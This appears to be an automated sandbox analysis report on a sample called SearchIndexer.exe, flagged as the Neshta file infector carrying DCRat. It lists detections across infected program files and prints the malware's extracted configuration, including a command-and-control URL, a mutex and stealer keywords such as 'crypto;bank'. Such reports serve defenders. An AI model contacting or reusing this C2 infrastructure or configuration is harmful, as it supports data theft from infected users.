Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	Avira: detection malicious, Label: W32/Neshta.A

Found malware configuration

Source: 00000001.00000002.2127156307.00000000132DA000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: DCRat {"C2 url": "http://519600cl.nyashtop.top/authDatalifeCdnTemporary", "MUTEX": "DCR_MUTEX-QVgodjXaIbAcRVoIzEKD", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Multi AV Scanner detection for dropped file

Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe	ReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe	ReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	ReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	ReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	ReversingLabs: Detection: 100%
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe	ReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	ReversingLabs: Detection: 97%
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	ReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	ReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\AutoIt3\Uninstall.exe	ReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	ReversingLabs: Detection: 100%
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	ReversingLabs: Detection: 100%
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	ReversingLabs: Detection: 100%
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	ReversingLabs: Detection: 100%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe	ReversingLabs: Detection: 100%
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	ReversingLabs: Detection: 100%
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	ReversingLabs: Detection: 100%
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	ReversingLabs: Detection: 100%
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	ReversingLabs: Detection: 100%
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	ReversingLabs: Detection: 100%
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	ReversingLabs: Detection: 100%
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	ReversingLabs: Detection: 100%
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	ReversingLabs: Detection: 100%
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	ReversingLabs: Detection: 100%
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	ReversingLabs: Detection: 100%
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	ReversingLabs: Detection: 100%
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	ReversingLabs: Detection: 100%
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	ReversingLabs: Detection: 100%
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe	ReversingLabs: Detection: 100%
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe	ReversingLabs: Detection: 100%
Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	ReversingLabs: Detection: 100%
Source: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe	ReversingLabs: Detection: 100%
Source: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe	ReversingLabs: Detection: 100%
Source: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe	ReversingLabs: Detection: 100%
Source: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe	ReversingLabs: Detection: 100%
Source: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe	ReversingLabs: Detection: 100%
Source: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe	ReversingLabs: Detection: 100%
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\ACCICONS.EXE	ReversingLabs: Detection: 100%
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exe	ReversingLabs: Detection: 100%
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection.exe	ReversingLabs: Detection: 100%
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection64.exe	ReversingLabs: Detection: 100%
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\DATABASECOMPARE.EXE	ReversingLabs: Detection: 100%
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\SPREADSHEETCOMPARE.EXE	ReversingLabs: Detection: 100%
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe	ReversingLabs: Detection: 100%

Multi AV Scanner detection for submitted file

Source: SearchIndexer.exe	Virustotal: Detection: 88%			Perma Link
Source: SearchIndexer.exe	ReversingLabs: Detection: 100%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 98.4% probability

Machine Learning detection for dropped file

Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Uninstall.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXE	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: SearchIndexer.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000001.00000002.2127156307.00000000132DA000.00000004.00000800.00020000.00000000.sdmp	String decryptor: {"0":[],"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Smart","_1":"False","_2":"False","_3":"False"},"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"System drive"},"d1159ac1-2243-45e3-9bad-55df4f7732e9":{"_0":"crypto;bank;authorization;account","_1":"1500","_2":"15","_3":"True"}}
Source: 00000001.00000002.2127156307.00000000132DA000.00000004.00000800.00020000.00000000.sdmp	String decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-QVgodjXaIbAcRVoIzEKD","0","","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ=="]
Source: 00000001.00000002.2127156307.00000000132DA000.00000004.00000800.00020000.00000000.sdmp	String decryptor: [["http://519600cl.nyashtop.top/","authDatalifeCdnTemporary"]]

Source: SearchIndexer.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Directory created: C:\Program Files\Windows Photo Viewer\RuntimeBroker.exe			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Directory created: C:\Program Files\Windows Photo Viewer\9e8d7a4ca61bd9			Jump to behavior

Source:	Binary string: D:\dbs\el\omr\Target\x86\ship\postc2rcross\x-none\appsharinghookcontroller.pdbr.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: AppSharingHookController.exe.0.dr
Source:	Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\cnfnot32.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: CNFNOT32.EXE.0.dr
Source:	Binary string: D:\dbs\el\omr\Target\x86\ship\postc2rcross\x-none\appsharinghookcontroller.pdb source: AppSharingHookController.exe.0.dr
Source:	Binary string: D:\a\_work\e\src\out\Release_x64\msedge_pwa_launcher.exe.pdbOGP source: msedge_pwa_launcher.exe.0.dr
Source:	Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\clview.pdb source: CLVIEW.EXE.0.dr
Source:	Binary string: D:\a\_work\e\src\out\Release_x64\msedge_pwa_launcher.exe.pdb source: msedge_pwa_launcher.exe.0.dr
Source:	Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\cnfnot32.pdb source: CNFNOT32.EXE.0.dr
Source:	Binary string: D:\dbs\el\ja2\Target\x86\ship\dcf\x-none\DatabaseCompare.pdb source: DATABASECOMPARE.EXE.0.dr
Source:	Binary string: d:\dbs\el\omr\target\x86\ship\click2run\x-none\Integrator.pdb source: integrator.exe.0.dr
Source:	Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\sdxhelper.pdb source: SDXHelper.exe.0.dr
Source:	Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\graph.pdb source: GRAPH.EXE.0.dr
Source:	Binary string: r.pdb source: AppSharingHookController.exe.0.dr
Source:	Binary string: d:\dbs\el\ja2\target\x86\ship\dw\x-none\dw20.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: DW20.EXE.0.dr
Source:	Binary string: d:\dbs\el\ja2\target\x86\ship\dw\x-none\dw20.pdb source: DW20.EXE.0.dr
Source:	Binary string: d:\dbs\el\omr\target\x86\ship\click2run\x-none\Integrator.pdb0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: integrator.exe.0.dr
Source:	Binary string: VSTOInstaller.pdb source: VSTOInstaller.exe.0.dr
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\qhmtfwmp\qhmtfwmp.pdb source: SearchIndexer.exe, 00000001.00000002.1913109715.0000000003888000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\graph.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: GRAPH.EXE.0.dr
Source:	Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\clview.pdb0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: CLVIEW.EXE.0.dr
Source:	Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\sdxhelper.pdblper.pdb0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: SDXHelper.exe.0.dr
Source:	Binary string: D:\dbs\el\ja2\Target\x86\ship\dcf\x-none\Common.DBConnection64.pdb source: Common.DBConnection64.exe.0.dr
Source:	Binary string: lper.pdb source: SDXHelper.exe.0.dr
Source:	Binary string: MicrosoftEdgeUpdate_unsigned.pdb source: MicrosoftEdgeUpdate.exe.0.dr

Spreading

Yara detected Neshta

Source: Yara match	File source: SearchIndexer.exe, type: SAMPLE
Source: Yara match	File source: 0.0.SearchIndexer.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000034.00000002.2186722542.0000000000409000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2762934153.0000000000409000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SearchIndexer.exe PID: 6636, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.com PID: 9192, type: MEMORYSTR
Source: Yara match	File source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\DW\DW20.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection64.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\SDXHelper.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\misc.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\aimgr.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\AutoIt3\Uninstall.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\DATABASECOMPARE.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\svchost.com, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSREC.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\msoasb.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\Wordconv.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\joticon.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\SkypeSrv\SKYPESERVER.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\accicons.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\OLicenseHeartbeat.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\MSQRY32.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\SPREADSHEETCOMPARE.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrBroker.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\SELFCERT.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\OcPubMgr.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\WORDICON.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\AppSharingHookController64.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\dbcicons.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Source Engine\OSE.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\SCANPST.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\ORGCHART.EXE, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\PPTICO.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTE.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXE, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\chrome.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\officeappguardwin32.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\PerfBoost.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\wordicon.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\AutoIt3\Au3Check.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\VPREVIEW.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Windows Defender\SearchIndexer.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrSanBroker.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\AutoIt3\Au3Info.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeComRegisterShellARM64.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOICONS.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\sscicons.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\IEContentService.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\NAMECONTROLSERVER.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\grv_icons.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\SETLANG.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\lyncicon.exe, type: DROPPED
